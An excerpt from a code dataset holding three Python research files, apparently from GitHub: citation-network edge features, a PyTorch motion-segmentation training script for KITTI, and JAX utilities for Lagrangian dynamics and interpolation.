'd_pagerank',\n 'u_pagerank', 'd_closeness', 'u_closeness',\n 'd_betweenness', 'u_betweenness', 'authorities',\n 'hubs', 'd_eigen', 'u_eigen']\n\nvertex_metrics += ['recentcite_' + str(t) for t in np.arange(100+1)]\n\n\ndef get_edge_data(G, edgelist, snapshot_df, columns_to_use,\n tfidf_matrix=None, op_id_to_bow_id=None,\n metric_normalization=None, edge_status=None):\n \"\"\"\n Returns a data frame for all edges from given edge list\n for a given snapshot\n\n Parameters\n ----------\n G: graph (igraph object)\n\n edgelist: igraph indices of edges whose data to get\n\n snapshot_df: dictionary containing the snapshot information\n\n columns_to_use: list of columns to use\n\n tfidf_matrix: precomputed tfidf_matrix\n op_id_to_bow_id: dict that maps CL ids to indices of tdidf matrix\n\n edge_status: are the edges all present or absent or do we need to find out\n\n metric_normalization: normalize the snapshot metrics\n \"\"\"\n\n # make sure columns_to_use is a list\n if type(columns_to_use) == str:\n columns_to_use = [columns_to_use]\n\n num_edges = len(edgelist)\n\n # CL ids of ed cases (indexes the snap_df rows)\n ed_op_ids = [G.vs[edge[1]]['name'] for edge in edgelist]\n ing_op_ids = [G.vs[edge[0]]['name'] for edge in edgelist]\n\n # case dates\n ed_year = np.array([G.vs[edge[1]]['year'] for edge in edgelist])\n ing_year = np.array([G.vs[edge[0]]['year'] for edge in edgelist])\n\n # ed metrics in ing year ordered by ed_op_ids\n # note snapshot_df indices are ints\n ed_metrics = snapshot_df.loc[[int(i) for i in ed_op_ids]]\n\n # initialize edge data frame\n edge_data = pd.DataFrame(index=zip(ing_op_ids, ed_op_ids))\n edge_data.index.name = 'op_id' # op_id\n\n # add columns to edge data frame\n for metric in columns_to_use:\n\n # which vertex metrics from the snapshot df to grab\n # i.e. 
only grab vertex metric columns\n vertex_metrics_to_use = set(ed_metrics.columns).difference('year')\n\n if metric in vertex_metrics_to_use:\n edge_data[metric] = ed_metrics[metric].tolist()\n elif metric == 'age':\n edge_data[metric] = ing_year - ed_year\n elif metric == 'ing_year':\n edge_data[metric] = ing_year\n elif metric == 'ed_year':\n edge_data[metric] = ed_year\n elif metric == 'similarity':\n edge_data[metric] = compute_similarities(ing_op_ids, ed_op_ids,\n tfidf_matrix,\n op_id_to_bow_id)\n\n # possibly normalize metrics\n if metric_normalization:\n\n # only normalize graph vertex metrics i.e. not age\n metrics_to_normalize = set(columns_to_use).intersection(set(vertex_metrics))\n\n # normalize metics that deserve it\n for metric in metrics_to_normalize:\n values = edge_data[metric]\n scaling = get_scaling(values, metric_normalization, alpha=.05)\n edge_data[metric] = values / scaling\n\n # add edge status\n if edge_status is not None:\n if edge_status == 'present':\n is_edge = [1] * num_edges\n elif edge_status == 'absent':\n is_edge = [0] * num_edges\n elif edge_status == 'find':\n # look up edge status\n is_edge = [int(edge_is_present(G, e[0], e[1])) for e in edgelist]\n\n edge_data['is_edge'] = is_edge\n\n return edge_data\n\n\ndef get_scaling(values, scaling, alpha=.05):\n \"\"\"\n Returns scaling\n \"\"\"\n if scaling == 'mean':\n return np.mean(values)\n\n # robust mean (np.percentile expects q as a percentage in [0, 100])\n elif scaling == 'upper trimmed mean':\n upper_bound = np.percentile(values, 100 * (1 - alpha))\n values_trimmed = values[values <= upper_bound]\n return np.mean(values_trimmed)\n elif scaling == 'lower trimmed mean':\n lower_bound = np.percentile(values, 100 * alpha)\n values_trimmed = values[values >= lower_bound]\n return np.mean(values_trimmed)\n elif scaling == 'trimmed mean':\n upper_bound = np.percentile(values, 100 * (1 - alpha))\n lower_bound = np.percentile(values, 100 * alpha)\n\n values_trimmed = values[(values >= lower_bound) & (values <= upper_bound)]\n return np.mean(values_trimmed)\n\n elif scaling == 'median':\n return np.median(values)\n elif scaling == 'max':\n return np.max(values)\n\n elif scaling == 'percentile':\n return np.percentile(values, 100 * alpha)\n\n else:\n raise ValueError('%s not implemented' % scaling)\n","repo_name":"idc9/law-net","sub_path":"vertex_metrics_experiment/code/get_edge_data.py","file_name":"get_edge_data.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"36595519854","text":"import time\nfrom tqdm import tqdm\nimport os\nimport random\nimport argparse\nimport numpy as np\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom PIL import Image\n\nfrom utils.visualizer import Visualizer\nfrom utils.loss import seg_loss, motion_loss\nfrom utils import scheduler, stream_metrics\n\nfrom dataset.seg_dataset import KITTIDataset\nfrom dataset.utils.warper import inverse_warp2\nfrom monodepth2 import layers\nfrom models.RMS import RMS\n\n\ndef get_argparser():\n parser = argparse.ArgumentParser()\n\n # Datset Options\n parser.add_argument(\"--train_file\", type=str, default='/home/zhanl/data/code/motion_seg/data/train.txt')\n parser.add_argument(\"--val_file\", type=str, default='/home/zhanl/data/code/motion_seg/data/val.txt')\n parser.add_argument(\"--dataset\", type=str, default='kitti',\n choices=['voc', 'cityscapes', 'kitti'], help='Name of dataset')\n parser.add_argument(\"--num_classes\", type=int, default=9, # FIXME 
7 classes in total, 8 including the background\n help=\"num classes (default: None)\")\n parser.add_argument(\"--resize_factor\", type=tuple, default=(128, 416), help='the size of input images')\n\n # Deeplabv3+ Options\n parser.add_argument(\"--model\", type=str, default='RMS', help='model name')\n parser.add_argument(\"--separable_conv\", action='store_true', default=False,\n help=\"apply separable conv to decoder and aspp\") # a simple tool ``network.convert_to_separable_conv`` to convert ``nn.Conv2d`` to ``AtrousSeparableConvolution``\n #parser.add_argument(\"--pretrained_model\", type=str, default=, help='the path of pretrained mobilenetV2_ca')\n parser.add_argument(\"--downsample_factor\", type=int, default=8, choices=[8, 16]) # output_stride\n\n # Motion Options\n #parser.add_argument()\n #parser.add_argument()\n\n # Train Options\n parser.add_argument(\"--total_itrs\", type=int, default=30e3,\n help=\"epoch number (default: 30k)\") # unclear how many iterations is best\n\n parser.add_argument(\"--test_only\", action='store_true', default=False, help='validate only, without training')\n parser.add_argument(\"--val_interval\", type=int, default=100, # TODO\n help=\"epoch interval for eval (default: 100): how often to evaluate and save the latest weights; evaluation is costly, so evaluating too often slows training\")\n parser.add_argument(\"--save_val_results\", action='store_true', default=False,\n help=\"save segmentation results to \\\"./results\\\"\") # whether to save the results of each validation run\n parser.add_argument(\"--save_dir\", type=str, default='/home/zhanl/data/code/motion_seg/logs', help=\"directory where weights and log files are saved\")\n\n parser.add_argument(\"--lr\", type=float, default=0.01,\n help=\"initial learning rate (default: 0.01)\")\n parser.add_argument(\"--lr_policy\", type=str, default='poly', choices=['poly', 'step'],\n help=\"learning rate scheduler policy\")\n parser.add_argument(\"--step_size\", type=int, default=10000) # how often the learning rate decays\n parser.add_argument(\"--batch_size\", type=int, default=16,\n help='batch size (default: 16)')\n parser.add_argument(\"--val_batch_size\", type=int, default=16,\n help='batch size for validation (default: 16)')\n parser.add_argument(\"--crop_size\", type=int, default=128)\n parser.add_argument(\"--alpha\", type=float, default=10.0, help=\"hyperparameter: weight of the semantic segmentation loss\")\n parser.add_argument(\"--beta\", type=float, default=1.0, help=\"hyperparameter: weight of the motion estimation loss\")\n # TODO\n parser.add_argument(\"--cls_weight\", type=str, help=\"optionally assign different loss weights per class (balanced by default); if set, pass a numpy-style array whose length equals num_classes.\")\n\n parser.add_argument(\"--ckpt\", default=None, type=str,\n help=\"restore from checkpoint\") # local checkpoint to resume training from\n parser.add_argument(\"--continue_training\", action='store_true', default=False)\n\n parser.add_argument(\"--loss_type\", type=str, default='cross_entropy',\n choices=['cross_entropy', 'focal_loss'], help=\"loss type\") # with fewer than 10 classes, dice loss is added on top of cross entropy; focal loss mainly counters positive/negative sample imbalance\n\n parser.add_argument(\"--weight_decay\", type=float, default=1e-4,\n help='weight decay (default: 1e-4)')\n parser.add_argument(\"--random_seed\", type=int, default=1,\n help=\"random seed (default: 1)\")\n\n parser.add_argument(\"--gpu_id\", type=str, default='0, 1, 2, 3',\n help=\"GPU ID\")\n parser.add_argument(\"--num_workers\", type=int, default=4, help=\"number of worker threads for data loading\")\n\n # Visdom options\n parser.add_argument(\"--enable_vis\", action='store_true', default=True,\n help=\"use visdom for visualization\")\n parser.add_argument(\"--vis_port\", type=str, default='13570',\n help='port for visdom')\n parser.add_argument(\"--vis_env\", type=str, default='main',\n help='env for visdom')\n parser.add_argument(\"--vis_num_samples\", type=int, default=8,\n help='number of samples for visualization 
\ndef get_dataset(opts):\n    \"\"\" Dataset And Augmentation\n    train_transform = et.ExtCompose([\n        et.ExtRandomCrop(size=(opts.crop_size, opts.crop_size)),\n        et.ExtColorJitter(brightness=0.5, contrast=0.5, saturation=0.5),\n        et.ExtRandomHorizontalFlip(),\n        et.ExtToTensor(),\n        et.ExtNormalize(mean=[0.485, 0.456, 0.406],\n                        std=[0.229, 0.224, 0.225]),\n    ])\n\n    val_transform = et.ExtCompose([\n        # et.ExtResize( 512 ),\n        et.ExtToTensor(),\n        et.ExtNormalize(mean=[0.485, 0.456, 0.406],\n                        std=[0.229, 0.224, 0.225]),\n    ])\"\"\"\n    if opts.dataset == 'kitti':\n        # may need some brightness augmentation here\n        train_dst = KITTIDataset(file=opts.train_file, new_size=opts.resize_factor)\n        val_dst = KITTIDataset(file=opts.val_file, new_size=opts.resize_factor)\n    return train_dst, val_dst\n\n\ndef validate(opts, model, loader, device, metrics, ret_samples_ids=None):\n    \"\"\"Do validation and return specified samples\"\"\"\n    metrics.reset()  # reset the metric object's state\n    ret_samples = []\n    if opts.save_val_results:\n        if not os.path.exists('results'):\n            os.mkdir('results')\n        # denormalize so images stay visible in visdom; note the raw KITTI images fed to the network were never normalized\n        #denorm = utils.Denormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n        img_id = 0\n\n    with torch.no_grad():\n\n        for i, data in tqdm(enumerate(loader)):\n\n            labels, Ir, It, Dr, Dt, pose, intrinsics_ = (data[s].to(device) for s in ['label', 'Ir', 'It', 'Dr', 'Dt', 'pose', 'intrinsics_mat'])\n            warped_image, warped_depth = inverse_warp2(Ir, Dt, Dr, pose, intrinsics=intrinsics_,\n                                                       rotation_mode='euler',\n                                                       padding_mode='zeros')  # TODO: projection method not settled yet\n            # residual warped image and residual warped depth\n            residual_image = torch.abs(It - warped_image)\n            residual_depth = torch.abs(Dt - warped_depth)\n\n            Segr, Seg, res_trans = model(torch.cat((It, Ir), dim=1),  # visual cues\n                                         torch.cat((Dt, Dr, residual_depth, residual_image), dim=1))  # geometric cues\n            # the segmentation logits are unnormalized and may be all negative; casting them straight to np.uint8 would truncate everything to 0\n            preds = F.softmax(Seg, dim=1).detach().max(dim=1)[1].cpu().numpy()  # take the class index of the per-pixel maximum\n            targets = labels.cpu().numpy()\n\n            metrics.update(targets, preds)\n\n            if ret_samples_ids is not None and i in ret_samples_ids:  # get vis samples: pick a few results to visualize\n                ret_samples.append(\n                    (It[0].detach().cpu().numpy(), targets[0], preds[0]))\n\n            if opts.save_val_results:\n                for j in range(len(It)):\n                    image = It[j].detach().cpu().numpy()\n                    target = targets[j]\n                    pred = preds[j]\n                    #image = (denorm(image) * 255).transpose(1, 2, 0).astype(np.uint8)\n                    image = image.transpose(1, 2, 0).astype(np.uint8)  # fixed: transpose the single image, not the whole batch tensor It\n                    # decode_target is a classmethod that converts a seg mask into an RGB image, (N, H, W, 3), ranged 0~255, numpy array\n                    target = loader.dataset.decode_target(target).astype(np.uint8)\n                    pred = loader.dataset.decode_target(pred).astype(np.uint8)\n                    # save images locally\n                    Image.fromarray(image).save('results/%d_image.png' % img_id)\n                    Image.fromarray(target).save('results/%d_target.png' % img_id)\n                    Image.fromarray(pred).save('results/%d_pred.png' % img_id)\n                    img_id += 1\n    score = metrics.get_results()\n    return score, ret_samples\n\n\ndef main():\n    opts = get_argparser().parse_args()\n\n    # Setup visualization\n    vis = Visualizer(port=opts.vis_port,\n                     env=opts.vis_env) if opts.enable_vis else None\n    if vis is not None:  # display options\n        vis.vis_table(\"Options\", vars(opts))\n\n    os.environ['CUDA_VISIBLE_DEVICES'] = opts.gpu_id  # 0,1,2,3\n    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n    print(\"Device: %s\" % device)\n\n    # Setup random seed\n    torch.manual_seed(opts.random_seed)\n    np.random.seed(opts.random_seed)\n    random.seed(opts.random_seed)\n\n
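# [Editor's aside -- illustrative, not original code] In `validate` above,
# `F.softmax(Seg, dim=1).max(dim=1)[1]` is the per-pixel argmax over the class
# channels; since softmax is monotonic, the same labels come straight from the
# raw logits:
#   import torch
#   logits = torch.randn(2, 8, 4, 4)  # (N, C, H, W) with C = 8 classes
#   assert torch.equal(logits.argmax(dim=1),
#                      torch.softmax(logits, dim=1).argmax(dim=1))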
    # Setup dataloader\n    train_dst, val_dst = get_dataset(opts)\n    train_loader = DataLoader(\n        train_dst, batch_size=opts.batch_size, shuffle=True, num_workers=opts.num_workers,\n        drop_last=True)  # drop_last=True to ignore single-image batches.\n    val_loader = DataLoader(\n        val_dst, batch_size=opts.val_batch_size, shuffle=True, num_workers=opts.num_workers)\n    print(\"Dataset: %s, Train set: %d, Val set: %d\" %\n          (opts.dataset, len(train_dst), len(val_dst)))\n\n    # num_classes*2: output segmentation maps for both frames\n    model = RMS(image_size=opts.resize_factor, num_classes=opts.num_classes*2, downsample_factor=opts.downsample_factor)\n    # apply separable (atrous) convolution to the decoder\n    \"\"\"if opts.separable_conv and 'plus' in opts.model:\n        network.convert_to_separable_conv(model.classifier)\"\"\"\n    scheduler.set_bn_momentum(model.backbone, momentum=0.01)\n\n    # Set up metrics\n    metrics = stream_metrics.StreamSegMetrics(opts.num_classes)\n\n    # Set up optimizer\n    '''params=[\n        {'params': model.backbone.parameters(), 'lr': 0.1 * opts.lr},\n        {'params': model.classifier.parameters(), 'lr': opts.lr},\n        {'params': model.seg_decoder.parameters(), 'lr': opts.lr},\n        {'params': model.motion_decoder.parameters(), 'lr':opts.lr},]'''\n    optimizer = torch.optim.SGD(model.parameters(), lr=opts.lr, momentum=0.9, weight_decay=opts.weight_decay)\n    # optimizer = torch.optim.SGD(params=model.parameters(), lr=opts.lr, momentum=0.9, weight_decay=opts.weight_decay)\n    # torch.optim.lr_scheduler.StepLR(optimizer, step_size=opts.lr_decay_step, gamma=opts.lr_decay_factor)\n    if opts.lr_policy == 'poly':\n        scheduler_ = scheduler.PolyLR(optimizer, opts.total_itrs, power=0.9)\n    elif opts.lr_policy == 'step':\n        scheduler_ = torch.optim.lr_scheduler.StepLR(optimizer, step_size=opts.step_size, gamma=0.1)\n\n    # Set up criterion\n    # criterion = utils.get_loss(opts.loss_type)\n    if opts.loss_type == 'focal_loss':\n        criterion1 = seg_loss.FocalLoss(ignore_index=255, size_average=True)\n    elif opts.loss_type == 'cross_entropy':\n        criterion1 = seg_loss.CELoss()\n    criterion2 = motion_loss.MotionLoss()\n\n    def save_ckpt(path):\n        \"\"\" save current model\n        \"\"\"\n        torch.save({\n            \"cur_itrs\": cur_itrs,\n            \"model_state\": model.module.state_dict(),\n            \"optimizer_state\": optimizer.state_dict(),\n            \"scheduler_state\": scheduler_.state_dict(),\n            \"best_score\": best_score,\n        }, path)\n        print(\"Model saved as %s\" % path)\n\n    # Restore\n    best_score = 0.0\n    cur_itrs = 0\n    cur_epochs = 0\n    if opts.ckpt is not None and os.path.isfile(opts.ckpt):\n        # https://github.com/VainF/DeepLabV3Plus-Pytorch/issues/8#issuecomment-605601402, @PytaichukBohdan\n        checkpoint = torch.load(opts.ckpt, map_location=torch.device('cpu'))\n        model.load_state_dict(checkpoint[\"model_state\"])\n        model = nn.DataParallel(model)\n        model.to(device)\n        # resume a previously interrupted training run\n        if opts.continue_training:\n            optimizer.load_state_dict(checkpoint[\"optimizer_state\"])\n            scheduler_.load_state_dict(checkpoint[\"scheduler_state\"])\n            cur_itrs = checkpoint[\"cur_itrs\"]\n            best_score = checkpoint['best_score']\n            print(\"Training state restored from %s\" % opts.ckpt)\n        print(\"Model restored from %s\" % opts.ckpt)\n        del checkpoint  # free memory\n    else:\n        print(\"[!] Retrain\")\n        model = nn.DataParallel(model)\n        model.to(device)\n
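# [Editor's aside -- hedged sketch] The 'poly' policy selected above typically
# decays as lr = base_lr * (1 - cur_iter / max_iters) ** power; assuming
# scheduler.PolyLR follows that convention (power=0.9 here), a self-contained
# equivalent is:
#   def _poly_lr(base_lr, cur_iter, max_iters, power=0.9):
#       return base_lr * (1 - cur_iter / max_iters) ** power
#   _poly_lr(0.01, 15000, 30000)  # ~0.0054 halfway through training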
Retrain\")\n model = nn.DataParallel(model)\n model.to(device)\n\n # ========== Train Loop ==========#\n vis_sample_id = np.random.randint(0, len(val_loader), opts.vis_num_samples,\n np.int32) if opts.enable_vis else None # sample idxs for visualization\n #denorm = utils.Denormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # denormalization for ori images\n\n if opts.test_only:\n model.eval()\n val_score, ret_samples = validate(\n opts=opts, model=model, loader=val_loader, device=device, metrics=metrics, ret_samples_ids=vis_sample_id)\n print(metrics.to_str(val_score))\n return\n\n interval_loss = 0\n while True: # cur_itrs < opts.total_itrs:\n # ===== Train =====\n model.train()\n cur_epochs += 1\n for data in train_loader:\n cur_itrs += 1\n\n labels, Ir, It, Dr, Dt, pose, intrinsics_ = (data[s].to(device) for s in ['label', 'Ir', 'It', 'Dr', 'Dt', 'pose', 'intrinsics_mat'])\n warped_image, warped_depth = inverse_warp2(Ir, Dt, Dr, pose, intrinsics=intrinsics_,\n rotation_mode='euler', padding_mode='zeros') # TODO 投影的方式不确\n # residual warped image 和 residual warped depth\n residual_image = torch.abs(It-warped_image)\n residual_depth = torch.abs(Dt-warped_depth)\n optimizer.zero_grad()\n # 前半部分是参考帧即t-1帧的分割结果, 后半部分是目标帧即t帧的分割结果\n Segr, Segt, res_trans = model(torch.cat((Ir, It), dim=1), # visual cues\n torch.cat((Dr, Dt, residual_depth, residual_image), dim=1)) # geometric cue\n\n # appearance→occlusion mask,这里使用的entropycross损失函数内部会进行一次softmax,所以不需要再归一化了\n loss1 = criterion1(Segt, labels) # TODO 可以加上warped seg和原seg的差值(可以加上occlusion mask):这里得到的mask可以再判断其准确度是否能用在motion_loss里面\n\n #这里的两个mask也是没有经过softmax归一化的 TODO\n loss2 = criterion2(Ir, It, Dr, Dt, pose, intrinsics_, res_trans, torch.argmax(Segt, dim=1, keepdim=True),\n torch.argmax(Segr, dim=1, keepdim=True), loss1)\n\n loss = opts.alpha * loss1 + opts.beta * loss2 # TODO 损失占比还不确定\n loss.backward()\n optimizer.step()\n\n np_loss, np_loss1, np_loss2 = loss.detach().cpu().numpy(), loss1.detach().cpu().numpy(), loss2.detach().cpu().numpy()\n interval_loss += np_loss\n if vis is not None:\n vis.vis_scalar('SegLoss', cur_itrs, np_loss1) # 分开展示\n vis.vis_scalar('MotionLoss', cur_itrs, np_loss2)\n\n if (cur_itrs) % 10 == 0:\n interval_loss = interval_loss / 10\n print(\"Epoch %d, Itrs %d/%d, Loss=%f\" %\n (cur_epochs, cur_itrs, opts.total_itrs, interval_loss))\n interval_loss = 0.0\n\n # validation 这里每训练160个数据就要测试2574个数据???\n if (cur_itrs) % opts.val_interval == 0:\n save_ckpt('logs/latest_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.downsample_factor))\n print(\"validation...\")\n model.eval()\n val_score, ret_samples = validate( # dict:5 和\n opts=opts, model=model, loader=val_loader, device=device, metrics=metrics,\n ret_samples_ids=vis_sample_id)\n\n print(metrics.to_str(val_score))\n\n if val_score['Mean IoU'] > best_score: # save best model\n best_score = val_score['Mean IoU']\n save_ckpt('logs/best_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.downsample_factor))\n\n if vis is not None: # visualize validation score and samples\n vis.vis_scalar(\"[Val] Overall Acc\", cur_itrs, val_score['Overall Acc'])\n vis.vis_scalar(\"[Val] Mean IoU\", cur_itrs, val_score['Mean IoU'])\n vis.vis_table(\"[Val] Class IoU\", val_score['Class IoU'])\n\n for k, (img, target, lbl) in enumerate(ret_samples):\n img = (img*255).astype(np.uint8) # [3, 128, 416]\n target = train_dst.decode_target(target).transpose(2, 0, 1).astype(np.uint8) # [3, 128, 416]\n lbl = train_dst.decode_target(lbl).transpose(2, 0, 1).astype(np.uint8) # [3, 128, 
\n                        #moving_prediction =  # TODO\n                        concat_img = np.concatenate((img, target, lbl), axis=1)  # [3, 384, 416]\n                        vis.vis_image('Sample %d' % k, concat_img)\n            model.train()\n            scheduler_.step()\n\n            if cur_itrs >= opts.total_itrs:\n                return\n\n\nif __name__ == '__main__':\n    torch.multiprocessing.set_start_method(method='forkserver', force=True)#'spawn')\n    main()","repo_name":"Zhuweilong123/motion_segment","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":18751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7913887128","text":"from functools import partial\nfrom itertools import permutations\nimport torch\nimport numpy as np\n\nimport jax\nimport jax.numpy as jnp\nfrom jax import lax\nfrom jax.tree_util import tree_flatten, tree_unflatten\n\n\ndef color_palette(n, s=0.5, offset=0.):\n    s = 0.5\n    r = min(s / 2, (1 - s) / 2)\n\n    alpha = jnp.linspace(0, 2 * np.pi, n, endpoint=False) + offset\n    alpha = alpha[:, None]\n    u = jnp.ones(3) / jnp.sqrt(3)\n    v = jnp.array([0., -1., 1.]) / jnp.sqrt(2)\n    w = jnp.cross(u, v)\n\n    colors = u + r * jnp.cos(alpha) * v + r * jnp.sin(alpha) * w\n    return colors\n\n\ndef visualize_n_maps(x, *args, **kwargs):\n    n = x.shape[-1]\n    colors = color_palette(n, *args, **kwargs)\n    canvas = x[..., jnp.newaxis] * colors\n    canvas = canvas.max(axis=-2)\n    return canvas\n\n\ndef angle_range(angles):\n    return (angles + np.pi) % (2 * np.pi) - np.pi\n\n\ndef get_mesh_grid(shape):\n    # defines axis convention\n    # (0, 0) at center of image\n    # x axis points to the right\n    # y axis points upwards\n    yy, xx = jnp.meshgrid(\n        jnp.linspace(1, -1, shape[-2]),\n        jnp.linspace(-1, 1, shape[-1]),\n        indexing='ij')\n    return xx, yy\n\n\ndef estimate_dist(s):\n    # s: score map (H x W)\n    s = s / s.sum()\n    xx, yy = get_mesh_grid(s.shape)\n\n    x_mean = (s * xx).sum()\n    y_mean = (s * yy).sum()\n\n    x_var = (s * (x_mean - xx) ** 2).sum()\n    y_var = (s * (y_mean - yy) ** 2).sum()\n    xy_var = (s * (x_mean - xx) * (y_mean -yy)).sum()\n\n    mean = jnp.array([x_mean, y_mean])\n    cov = jnp.array([\n        [x_var, xy_var],\n        [xy_var, y_var]\n    ])\n    return mean, cov\n\n\ndef numpy_collate(batch):\n    if isinstance(batch[0], np.ndarray):\n        return np.stack(batch)\n    elif isinstance(batch[0], (tuple,list)):\n        transposed = zip(*batch)\n        return [numpy_collate(samples) for samples in transposed]\n    elif isinstance(batch[0], dict):\n        return {key: numpy_collate([sample[key] for sample in batch]) for key in batch[0]}\n    else:\n        return np.array(batch)\n\n\nclass NumpyLoader(torch.utils.data.DataLoader):\n    def __init__(self, dataset, batch_size=1,\n                 shuffle=False, sampler=None,\n                 batch_sampler=None, num_workers=0,\n                 pin_memory=False, drop_last=False,\n                 timeout=0, worker_init_fn=None):\n        super(self.__class__, self).__init__(dataset,\n                                             batch_size=batch_size,\n                                             shuffle=shuffle,\n                                             sampler=sampler,\n                                             batch_sampler=batch_sampler,\n                                             num_workers=num_workers,\n                                             collate_fn=numpy_collate,\n                                             pin_memory=pin_memory,\n                                             drop_last=drop_last,\n                                             timeout=timeout,\n                                             worker_init_fn=worker_init_fn)\n\n\ndef augment_angular_dimensions(state, angular_dof_nums):\n    augmented_state = []\n    for i in range(state.shape[-1]):\n        if i in angular_dof_nums:\n            augmented_state.append(jnp.cos(state[..., i]))\n            augmented_state.append(jnp.sin(state[..., i]))\n        else:\n            augmented_state.append(state[..., i])\n    augmented_state = jnp.stack(augmented_state, -1)\n    return augmented_state\n\n\ndef construct_mass_matrix(on_diagonal, off_diagonal):\n    n = len(on_diagonal)\n    assert (n ** 2 - n) // 
2 == len(off_diagonal)\n\n on_diagonal_idxs = (jnp.arange(n), jnp.arange(n))\n off_diagonal_idxs = jnp.tril_indices(n, -1)\n\n l = jnp.zeros((n, n))\n l = jax.ops.index_update(l, on_diagonal_idxs, on_diagonal)\n l = jax.ops.index_update(l, off_diagonal_idxs, off_diagonal)\n\n mass_matrix = l @ l.T\n return mass_matrix\n\n\ndef equation_of_motion(models, params, state, t, action):\n action = params['input_matrix_diagonal'] * action\n\n def lagrangian(q, q_t):\n M = models['mass_matrix'].apply(params['mass_matrix'], q)\n T = 0.5 * q_t.T @ M @ q_t\n V = models['potential_energy'].apply(params['potential_energy'], q)\n L = T - V\n return L.squeeze()\n\n q, q_t = jnp.split(state, 2)\n q_tt = jnp.linalg.pinv(jax.hessian(lagrangian, 1)(q, q_t)) @ (jax.grad(lagrangian, 0)(q, q_t)\n - jax.jacobian(jax.jacobian(lagrangian, 1), 0)(q, q_t) @ q_t + action)\n return jnp.concatenate([q_t, q_tt])\n\n\ndef equation_of_motion_constrained(constraint, models, params, state, t, action):\n assert models['mass_matrix'].static\n a = partial(apply, models, params) # shorthand for the models\n\n x, x_t = jnp.split(state, 2)\n input_matrix = a('input_matrix')(x)\n\n m_inv = jnp.linalg.pinv(a('mass_matrix')(x))\n f = - jax.jacobian(a('potential_energy'), 0)(x).squeeze() + input_matrix @ action\n Dphi = jax.jacobian(constraint)(x)\n DDphi = jax.jacobian(jax.jacobian(constraint))(x)\n\n l = jnp.linalg.pinv(Dphi @ m_inv @ Dphi.T) @ (Dphi @ m_inv @ f + DDphi @ x_t @ x_t)\n x_tt = m_inv @ (f - Dphi.T @ l)\n return jnp.concatenate([x_t, x_tt])\n\n\ndef equation_of_motion_constrained_general(constraint, models, params, state, t, action):\n # general formulation, a little bit slower\n\n def lagrangian(x, x_t):\n M = models['mass_matrix'].apply(params['mass_matrix'], x)\n T = 0.5 * x_t.T @ M @ x_t\n V = models['potential_energy'].apply(params['potential_energy'], x)\n L = T - V\n return L.squeeze()\n\n x, x_t = jnp.split(state, 2)\n input_matrix = models['input_matrix'].apply(params['input_matrix'], x)\n\n m_inv = jnp.linalg.pinv(jax.hessian(lagrangian, 1)(x, x_t))\n f = jax.grad(lagrangian, 0)(x, x_t) - jax.jacobian(jax.jacobian(lagrangian, 1), 0)(x, x_t) @ x_t + input_matrix @ action\n Dphi = jax.jacobian(constraint)(x)\n DDphi = jax.jacobian(jax.jacobian(constraint))(x)\n\n l = jnp.linalg.pinv(Dphi @ m_inv @ Dphi.T) @ (Dphi @ m_inv @ f + DDphi @ x_t @ x_t)\n x_tt = m_inv @ (f - Dphi.T @ l)\n return jnp.concatenate([x_t, x_tt])\n\n\ndef interpolate_bilinear(image, i, j, pad_zero=True, relative_coordinates=True):\n \"\"\"\n from https://github.com/google/jax/issues/862\n based on http://stackoverflow.com/a/12729229\n \n Interpolate bilinearly at coordinates (i, j) in image.\n image: (height, width)\n rows: (nb_points,) relative coordinates\n cols: (nb_points,) relative coordinates\n returns interpolated values (nb_points,)\n \"\"\"\n if relative_coordinates:\n i *= image.shape[0]\n j *= image.shape[1]\n if pad_zero:\n image = jnp.pad(image, ((1, 1), (1, 1)))\n i += 1\n j += 1\n height, width = image.shape\n i_0 = jnp.floor(i).astype(jnp.int32)\n i_1 = i_0 + 1\n j_0 = jnp.floor(j).astype(jnp.int32)\n j_1 = j_0 + 1\n\n def rclip(i): return jnp.clip(i, 0, height - 1)\n def cclip(j): return jnp.clip(j, 0, width - 1)\n Ia = image[rclip(i_0), cclip(j_0)]\n Ib = image[rclip(i_1), cclip(j_0)]\n Ic = image[rclip(i_0), cclip(j_1)]\n Id = image[rclip(i_1), cclip(j_1)]\n\n wa = (j_1 - j) * (i_1 - i)\n wb = (j_1 - j) * (i - i_0)\n wc = (j - j_0) * (i_1 - i)\n wd = (j - j_0) * (i - i_0)\n\n return wa*Ia + wb*Ib + wc*Ic + wd*Id\n\n\ndef 
explicit_euler(f, x0, t, *args):\n dt = t[1] - t[0]\n def f_(x, t):\n x_dot = f(x, t, *args)\n x_new = x + x_dot * dt\n return x_new, x_new\n _, history = lax.scan(f_, x0, t[1:])\n history = jnp.concatenate([x0[None], history])\n return history\n\n\ndef sum_losses(loss_fn, loss_weights):\n def f(*args):\n losses = loss_fn(*args)\n loss = sum([loss_weights[key] * losses[key] for key in losses])\n return loss, losses\n return f\n\n\ndef reduce_mean(fn, axis=0):\n return lambda *args: jax.tree_map(lambda x: jnp.mean(x, axis=axis), fn(*args))\n\n\ndef apply(models, params, key):\n return partial(models[key].apply, params[key])\n\n\ndef loss_fn_batched(loss_fn, params, batch, reduction='mean'):\n assert reduction in [None, 'mean', 'sum']\n value = jax.vmap(loss_fn, in_axes=(None, 0))(params, batch)\n\n if reduction:\n value_flat, value_tree = tree_flatten(value)\n if reduction == 'mean':\n value_flat_reduced = [jnp.mean(v, axis=0) for v in value_flat]\n elif reduction == 'sum':\n value_flat_reduced = [jnp.sum(v, axis=0) for v in value_flat]\n value = tree_unflatten(value_tree, value_flat_reduced)\n return value\n\n\ndef get_permutations(n):\n return list(permutations(range(n)))\n\n\ndef get_permutated_keypoints(keypoints, axis):\n num_keypoints = keypoints.shape[axis]\n permutated_keypoints = jnp.stack([keypoints.take(p, axis=axis) for p in permutations(range(num_keypoints))])\n return permutated_keypoints\n\n\ndef finite_difference(x, dt, mode='central', order=1):\n # x.shape = (num_timesteps, ...)\n assert mode in ['backward', 'central']\n assert order in [1, 2]\n if order == 2:\n x, x_t = finite_difference(x, dt, mode=mode)\n x_t, x_tt = 